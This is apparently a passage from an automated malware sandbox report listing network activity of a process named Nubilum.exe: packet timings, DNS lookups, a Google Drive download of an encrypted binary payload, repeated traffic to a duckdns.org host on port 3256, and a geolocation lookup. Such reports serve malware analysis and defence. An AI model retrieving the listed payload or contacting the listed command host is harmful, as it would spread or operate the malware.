                        Jul 2, 2024 07:39:43.572094917 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.572587013 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.572597980 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.572607994 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.572618008 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.572628021 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.572638035 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.572648048 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.573565960 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.573577881 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.573729992 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:43.575031996 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:43.575083017 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:43.580238104 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.580322027 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.580332041 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.580579042 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.580589056 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.580599070 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.580610037 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.581419945 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:43.601989985 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.602006912 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.602128029 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.602139950 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.602322102 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.602332115 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.602343082 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.602655888 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.602672100 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.602682114 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.602993965 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603003979 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603014946 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603025913 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603425026 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603435993 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603446007 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603455067 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603840113 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:43.603918076 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603929043 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603939056 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603949070 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603960037 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603969097 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603980064 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.603988886 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.604873896 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.604886055 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.604896069 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.604906082 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.604916096 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.604926109 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.604934931 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.604944944 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.605078936 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:43.605314970 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:43.605345011 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:43.605356932 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:43.605751991 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.605763912 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.605773926 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.605783939 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.605794907 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.605803967 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.605813980 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.605823994 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.605833054 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.606647015 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.606658936 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.606668949 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.606678963 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.606688976 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.606698990 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.606709003 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.606719017 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.607460976 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.607471943 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:43.614353895 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:43.619401932 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:43.619858027 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:43.669820070 CEST8049715178.237.33.50192.168.2.7
                        Jul 2, 2024 07:39:43.679689884 CEST4971580192.168.2.7178.237.33.50
                        Jul 2, 2024 07:39:43.764775991 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:47.311440945 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:47.316471100 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.316548109 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.316557884 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.316565990 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.316603899 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.316718102 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:47.316719055 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.316765070 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.316773891 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.316782951 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.316813946 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.321702003 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.321728945 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.321738005 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.321815014 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.321824074 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.321860075 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.321868896 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.335248947 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:47.340810061 CEST325649712217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:47.340868950 CEST497123256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:50.628725052 CEST325649709217.76.50.73192.168.2.7
                        Jul 2, 2024 07:39:50.630817890 CEST497093256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:39:50.638358116 CEST325649709217.76.50.73192.168.2.7
                        Jul 2, 2024 07:40:21.602911949 CEST325649709217.76.50.73192.168.2.7
                        Jul 2, 2024 07:40:21.605137110 CEST497093256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:40:21.609941959 CEST325649709217.76.50.73192.168.2.7
                        Jul 2, 2024 07:40:52.430532932 CEST325649709217.76.50.73192.168.2.7
                        Jul 2, 2024 07:40:52.432827950 CEST497093256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:40:52.438383102 CEST325649709217.76.50.73192.168.2.7
                        Jul 2, 2024 07:41:09.111480951 CEST4971580192.168.2.7178.237.33.50
                        Jul 2, 2024 07:41:09.420943022 CEST4971580192.168.2.7178.237.33.50
                        Jul 2, 2024 07:41:10.124051094 CEST4971580192.168.2.7178.237.33.50
                        Jul 2, 2024 07:41:11.327193975 CEST4971580192.168.2.7178.237.33.50
                        Jul 2, 2024 07:41:13.827306986 CEST4971580192.168.2.7178.237.33.50
                        Jul 2, 2024 07:41:18.827349901 CEST4971580192.168.2.7178.237.33.50
                        Jul 2, 2024 07:41:22.984641075 CEST325649709217.76.50.73192.168.2.7
                        Jul 2, 2024 07:41:22.986442089 CEST497093256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:41:22.991266966 CEST325649709217.76.50.73192.168.2.7
                        Jul 2, 2024 07:41:28.624154091 CEST4971580192.168.2.7178.237.33.50
                        Jul 2, 2024 07:41:54.071531057 CEST325649709217.76.50.73192.168.2.7
                        Jul 2, 2024 07:41:54.076864958 CEST497093256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:41:54.085529089 CEST325649709217.76.50.73192.168.2.7
                        Jul 2, 2024 07:42:24.692688942 CEST325649709217.76.50.73192.168.2.7
                        Jul 2, 2024 07:42:24.694314957 CEST497093256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:42:24.699079990 CEST325649709217.76.50.73192.168.2.7
                        Jul 2, 2024 07:42:55.237855911 CEST325649709217.76.50.73192.168.2.7
                        Jul 2, 2024 07:42:55.239964962 CEST497093256192.168.2.7217.76.50.73
                        Jul 2, 2024 07:42:55.244779110 CEST325649709217.76.50.73192.168.2.7
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 2, 2024 07:39:36.066152096 CEST5265853192.168.2.71.1.1.1
                        Jul 2, 2024 07:39:36.072906971 CEST53526581.1.1.1192.168.2.7
                        Jul 2, 2024 07:39:37.217484951 CEST6265353192.168.2.71.1.1.1
                        Jul 2, 2024 07:39:37.224951029 CEST53626531.1.1.1192.168.2.7
                        Jul 2, 2024 07:39:40.426650047 CEST6148353192.168.2.71.1.1.1
                        Jul 2, 2024 07:39:40.547380924 CEST53614831.1.1.1192.168.2.7
                        Jul 2, 2024 07:39:42.035876036 CEST6206453192.168.2.71.1.1.1
                        Jul 2, 2024 07:39:42.043719053 CEST53620641.1.1.1192.168.2.7
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jul 2, 2024 07:39:36.066152096 CEST192.168.2.71.1.1.10xb385Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                        Jul 2, 2024 07:39:37.217484951 CEST192.168.2.71.1.1.10xe00eStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                        Jul 2, 2024 07:39:40.426650047 CEST192.168.2.71.1.1.10x8627Standard query (0)a458386d9.duckdns.orgA (IP address)IN (0x0001)false
                        Jul 2, 2024 07:39:42.035876036 CEST192.168.2.71.1.1.10xc70bStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jul 2, 2024 07:39:36.072906971 CEST1.1.1.1192.168.2.70xb385No error (0)drive.google.com142.250.186.174A (IP address)IN (0x0001)false
                        Jul 2, 2024 07:39:37.224951029 CEST1.1.1.1192.168.2.70xe00eNo error (0)drive.usercontent.google.com142.250.186.161A (IP address)IN (0x0001)false
                        Jul 2, 2024 07:39:40.547380924 CEST1.1.1.1192.168.2.70x8627No error (0)a458386d9.duckdns.org217.76.50.73A (IP address)IN (0x0001)false
                        Jul 2, 2024 07:39:42.043719053 CEST1.1.1.1192.168.2.70xc70bNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                        • drive.google.com
                        • drive.usercontent.google.com
                        • geoplugin.net
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.749715178.237.33.50807688C:\Users\user\AppData\Local\Temp\Nubilum.exe
                        TimestampBytes transferredDirectionData
                        Jul 2, 2024 07:39:42.057733059 CEST71OUTGET /json.gp HTTP/1.1
                        Host: geoplugin.net
                        Cache-Control: no-cache
                        Jul 2, 2024 07:39:42.670948982 CEST1170INHTTP/1.1 200 OK
                        date: Tue, 02 Jul 2024 05:39:42 GMT
                        server: Apache
                        content-length: 962
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.749707142.250.186.1744437688C:\Users\user\AppData\Local\Temp\Nubilum.exe
                        TimestampBytes transferredDirectionData
                        2024-07-02 05:39:36 UTC216OUTGET /uc?export=download&id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: drive.google.com
                        Cache-Control: no-cache
                        2024-07-02 05:39:37 UTC1598INHTTP/1.1 303 See Other
                        Content-Type: application/binary
                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                        Pragma: no-cache
                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                        Date: Tue, 02 Jul 2024 05:39:37 GMT
                        Location: https://drive.usercontent.google.com/download?id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B&export=download
                        Strict-Transport-Security: max-age=31536000
                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                        Content-Security-Policy: script-src 'nonce-cCq4BHgrwt_Nglq8Qrxcag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                        Cross-Origin-Opener-Policy: same-origin
                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                        Server: ESF
                        Content-Length: 0
                        X-XSS-Protection: 0
                        X-Frame-Options: SAMEORIGIN
                        X-Content-Type-Options: nosniff
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.749708142.250.186.1614437688C:\Users\user\AppData\Local\Temp\Nubilum.exe
                        TimestampBytes transferredDirectionData
                        2024-07-02 05:39:37 UTC258OUTGET /download?id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B&export=download HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Cache-Control: no-cache
                        Host: drive.usercontent.google.com
                        Connection: Keep-Alive
                        2024-07-02 05:39:38 UTC4835INHTTP/1.1 200 OK
                        Content-Type: application/octet-stream
                        Content-Security-Policy: sandbox
                        Content-Security-Policy: default-src 'none'
                        Content-Security-Policy: frame-ancestors 'none'
                        X-Content-Security-Policy: sandbox
                        Cross-Origin-Opener-Policy: same-origin
                        Cross-Origin-Embedder-Policy: require-corp
                        Cross-Origin-Resource-Policy: same-site
                        X-Content-Type-Options: nosniff
                        Content-Disposition: attachment; filename="LxkgdAZcDtBtlXIK111.bin"
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Credentials: false
                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                        Accept-Ranges: bytes
                        Content-Length: 494656
                        Last-Modified: Mon, 01 Jul 2024 10:01:43 GMT
                        X-GUploader-UploadID: ACJd0NqBvKF1-6ZXx0xxqEMjb8k3kjLTvO4uQ5xfXZmvYVKD9xmXCnSFYsfORUwJHKsIBz4ixvGqel7HpA
                        Date: Tue, 02 Jul 2024 05:39:38 GMT
                        Expires: Tue, 02 Jul 2024 05:39:38 GMT
                        Cache-Control: private, max-age=0
                        X-Goog-Hash: crc32c=Z/q9bA==
                        Server: UploadServer
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close
                        2024-07-02 05:39:38 UTC4835INData Raw: 2f d5 3e 23 c4 54 e6 f4 42 17 20 70 a7 b7 45 f4 f9 f1 f6 d8 67 11 1e 0f a3 72 02 0e 6f 2c 23 fc 82 06 2b 44 f6 bf 31 61 38 b6 6d 35 fa ab c9 a4 5b b4 13 3d 47 e6 7c e2 5a ee c0 dd 40 89 dc 2b 73 5b 5e 17 20 cb 1d a4 27 8f af 8f db ae 54 d5 f2 46 01 d9 72 0e 83 06 e1 e9 28 16 0d 74 aa f8 af f2 eb f4 4e 7f da 67 7d 80 22 67 22 fa 3f 82 f0 df e4 02 58 30 12 3c ce 24 25 44 1f 92 e6 25 22 d7 05 24 7f 15 17 f7 39 40 af fa 51 5b dd 1e 17 18 17 c0 c6 4e fc 9e 75 9a fb de 71 5f c6 c7 3e ac be 7d c8 61 8d 7c bc f4 c2 00 ee ca 3c f0 0f 17 9a 24 2d d4 6e d2 a9 b6 24 17 5a 77 70 41 57 00 31 47 09 e1 70 72 64 e5 aa a0 d7 1f a9 2a 29 5c b6 7c cb 2d 61 12 48 22 a1 9e df 18 66 1e ae bc ff 8b 22 28 e9 14 51 50 5e aa 8f 78 12 e3 f2 a1 3b fd 75 53 25 06 8f 3a a3 88 db 0d a3
                        Data Ascii: />#TB pEgro,#+D1a8m5[=G|Z@+s[^ 'TFr(tNg}"g"?X0<$%D%"$9@Q[Nuq_>}a|<$-n$ZwpAW1Gprd*)\|-aH"f"(QP^x;uS%:
                        2024-07-02 05:39:38 UTC4835INData Raw: 5a dd 7f de da 85 30 cf a6 fa 63 64 a3 7b 34 98 5b ad 05 dc b9 15 d4 d4 4e 3b d6 ed 1f 12 f6 61 8e b0 9a 57 e9 0e f5 c7 5d 74 8a 4b 7f 06 6e 49 4a b9 80 36 45 20 11 8c 37 ff f0 56 a8 a9 02 88 ba 08 7e 9c 3e 1a a3 54 f8 9a 4c bc 5c 5e 8b 8a 7d a7 50 07 cc 1b 15 9d dc f0 f5 fd 42 58 03 e7 d5 7b b9 5f c1 cd c5 09 47 20 d8 75 dc 42 43 57 1d d2 d8 e1 f6 06 36 52 59 6e ca 65 9c 19 07 1e b8 51 fe 29 48 7e d4 e6 09 ee 39 49 90 27 2a c9 55 a7 ea d3 7f 8b 28 e0 25 03 c0 a8 c8 48 12 4c 39 23 59 c7 db 6b 26 89 1a 6c 28 e4 a8 36 fc 90 61 f5 40 82 b3 54 5c 10 cf 57 21 4e 3a e0 e6 1b 80 cb fd 9a 54 b7 8f 88 b9 9f ed 38 ee 05 af 76 72 ad f1 1c 50 85 6f 0e 1d f3 78 a2 6c a9 7e e0 d8 ec b9 b8 2d 86 51 ea 72 69 3f 7f 0e 24 8d 71 34 12 ab 79 81 7b fe 88 90 65 fd 5a 77 6b 1f
                        Data Ascii: Z0cd{4[N;aW]tKnIJ6E 7V~>TL\^}PBX{_G uBCW6RYneQ)H~9I'*U(%HL9#Yk&l(6a@T\W!N:T8vrPoxl~-Qri?$q4y{eZwk
                        2024-07-02 05:39:38 UTC193INData Raw: 10 8d 30 05 c6 a4 d2 c0 c5 6c 44 77 6e c0 37 07 a4 6d fe 67 65 dd 2a c7 41 14 c9 65 a8 c1 45 4d c5 8b 6f aa be 34 15 2e 13 10 98 3c 26 95 2b 26 91 3b 9f 8d 45 a0 41 b9 8f 3e 18 91 b9 e9 b1 0b b5 17 68 62 21 c6 e4 dd 44 d9 8c 5f 36 77 85 05 ea d4 74 7c 6b 34 2f 5c 12 23 7e 15 66 fc 83 53 2d ee fb 7c 45 ba 38 da cb 0b 74 56 ce ee 4b 85 92 e2 dc 24 d6 62 b3 f6 6f 32 91 1a 03 ce e9 85 94 7e 53 dc e7 0b de d7 85 fe ea e3 3d 52 99 a3 ec b2 4a 12 a2 24 3a bd ba b3 08 44 d2 33 73 5a 3d 2e af 20 1f f9 47 45 7c c7 b4 0e a4 e2 cf 61 08 13 da 2c 54 c5 68 76 04 c0 bf 95 82 1c 16 2d 99
                        Data Ascii: 0lDwn7mge*AeEMo4.<&+&;EA>hb!D_6wt|k4/\#~fS-|E8tVK$bo2~S=RJ$:D3sZ=. GE|a,Thv-
                        2024-07-02 05:39:38 UTC1323INData Raw: 1f 5b 3f 54 d6 4e 80 c8 6d 65 c3 a2 6e f6 2a 5c e8 bc 74 0b 89 9e 2b 36 05 4b 6b 4e 6e 06 1b b6 45 60 60 c7 31 51 4b fe fe c7 0e 25 44 b3 e8 ec eb 42 66 a7 a6 d1 5b 8b b5 f6 d8 63 dd a8 00 3e 21 d7 9b 4a 41 79 2a 96 31 7b 3f b6 47 99 09 f9 43 46 ed 4d 3c a9 db 78 18 33 b3 5d 9c af ad a9 89 5f 21 29 04 29 ed a7 5c 15 2b e4 2e 5d 82 9c c1 ee e6 06 10 a7 52 50 4f 5f 47 35 67 1f 39 9c ed 51 dc 9b 96 6f 0f 2f c3 bf 99 04 c0 3f 13 34 81 fd a9 82 b1 d5 7f 43 4b 46 50 e6 af 55 0e d6 75 e3 b5 0b 87 b4 cc e3 39 ff 68 07 ae fd 16 9b 7e 70 ba 63 d3 84 24 12 3f 3c b2 61 67 da 51 42 1a 2c 57 ae 27 3a 56 a2 b3 01 ce 17 73 40 d3 4c 9c 79 50 70 cf 6e d9 90 5a 16 8c 94 66 e6 01 06 a1 e9 78 9b 40 64 42 91 af f2 eb a4 c3 3a d2 37 f0 cd 2e 8f 43 fa 3f 82 a0 52 a1 fe d3 fe 42
                        Data Ascii: [?TNmen*\t+6KkNnE``1QK%DBf[c>!JAy*1{?GCFM<x3]_!))\+.]RPO_G5g9Qo/?4CKFPUu9h~pc$?<agQB,W':Vs@LyPpnZfx@dB:7.C?RB
                        2024-07-02 05:39:38 UTC1390INData Raw: d5 ae ab 2a 3e 62 19 52 bc 5b 6b 44 53 16 d7 9d c3 ff 52 10 1c 18 14 0b c5 23 fe 47 f6 4b ab 23 06 e2 c8 53 7b df 6f d2 73 e7 29 f6 c1 a2 81 44 0f 93 cd e0 07 0f 36 6e 5b 81 25 e5 6b d9 fe 3d 52 92 07 9c 81 94 34 75 3f ef 98 2b 44 1f 59 57 ef ce ab 6d 49 4f 8c f0 b0 cd 07 ed 1f 59 a0 ab c6 a1 77 5b 0f 78 d5 ae 00 32 e6 03 f8 b2 a1 e8 2e 2c 1a 41 0e 10 44 82 bb eb 5a f3 a8 df 0b 93 a4 1e 0f 7c 2a 4e b6 22 1b 19 5c 29 5e bb 78 e3 74 c6 ab eb 9c d9 1f a5 9c e5 d6 95 ef d1 4b f0 da 81 04 cd cc f0 f7 7c c0 2a 34 74 39 61 01 d3 a9 7c b8 ef 34 bf c6 ba af b5 23 1b ed 67 f3 1b 54 ac 39 1a f1 d9 11 e8 a1 73 fb 18 3d bc 04 d5 2e 91 d4 fe 97 b4 b5 59 94 ce 1c 2e 56 59 95 68 79 50 82 bc 8e a6 05 ce 39 3d ee 85 71 68 61 19 41 75 3e 65 78 a1 3e e2 54 be 5f ca 81 0f ce
                        Data Ascii: *>bR[kDSR#GK#S{os)D6n[%k=R4u?+DYWmIOYw[x2.,ADZ|*N"\)^xtK|*4t9a|4#gT9s=.Y.VYhyP9=qhaAu>ex>T_
